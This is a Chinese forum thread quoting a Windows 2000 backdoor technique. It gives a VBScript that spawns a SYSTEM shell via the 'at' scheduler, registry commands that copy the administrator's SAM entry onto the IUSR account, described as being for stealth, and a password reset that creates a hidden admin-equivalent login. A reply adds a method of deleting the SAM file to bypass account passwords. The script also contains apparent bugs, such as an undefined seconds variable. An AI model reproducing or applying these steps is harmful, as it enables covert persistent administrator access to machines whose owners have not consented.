引用:
|
作者: 貝斯特
首先要知道的概念是在Windows 2000和Windows NT,預設管理員帳號的SID
是固定的500(0x1f4),那麼我們可以用機器裡已經存在的一個帳號將SID為
500的帳號進行複製,在這裡我選擇的帳號是IUSR_MachineName(當然,為了
加強隱蔽性,我們選擇了這個帳號,所有帳號都可以用以下的方法,只不過這
個帳號較常見罷了),測試環境為Windows 2000 Server。
執行一個System的CMD Shell
'================================================================
On Error Resume Next
Set objNet = WScript.CreateObject( "WScript.Network" )
Set ServiceObj = GetObject("WinNT://" & objNet.ComputerName & "/schedule")
if ServiceObj.Status=1 then
ServiceObj.start
end if
aHour = hour(now)
aMinute = minute(now)+"1"
set wshshell = createobject ("wscript.shell")
wshshell.run ("at " & aHour & ":" & aMinute & ":" & aSecond & " " & "/interactive cmd.exe")
Wscript.echo "Waiting for the cmd window for NT AUTHORITY\SYSTEM at " & aHour & ":" & aMinute & "..."
'================================================================
或使用 psu.exe,然後在該CMD Shell裡面執行
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
這樣我們將SID 為500的管理員帳號的相關資料匯出,然後編輯adam.reg檔案,
將adam.reg檔案的第三行.....
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最後的"1F4"修改為
IUSR_MachineName的SID(大部分的機器該帳號的SID都為0x3E9,如果機器在最初安裝的時候沒有安裝IIS,而自己建了帳號後再安裝IIS就有可能不是這個值),將Root.reg檔案中的"1F4"修改為"3E9"後執行
regedit /s adam.reg 匯入該Reg檔案
然後執行
net user IUSR_MachineName Sphone 修改IUSR_MachineName的密碼......完成
|
已解決....但不是用大大的方法....是自己胡里胡塗的想通了...停用的部分沒想到3分鐘以內就搞定了.......
大大你的方法....照理說是可行的.....但在登錄檔中從HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 是找不到Domain及其後面的....既然找不到......當然就是沒用囉....
照大陸網友post的方法....
可用刪除SAM的方法....SAM檔是用來儲存本機帳戶資料的檔案.....前提是必須有一片可讀取NTFS的磁片....大陸網友示範的例子是XP系統...administrator沒掛...掛了普通用戶....XP系統預設是當建立一個新帳號後.....會將administrator隱藏起來....(可手動改變叫出).........若administrator沒掛...則可以使用安全模式的命令列登入administrator去解決.....
用ERD 2002 or 2003去解......試過應該是可以......但我手邊所收集到別人做的版本.....都不行...可能要自己做吧....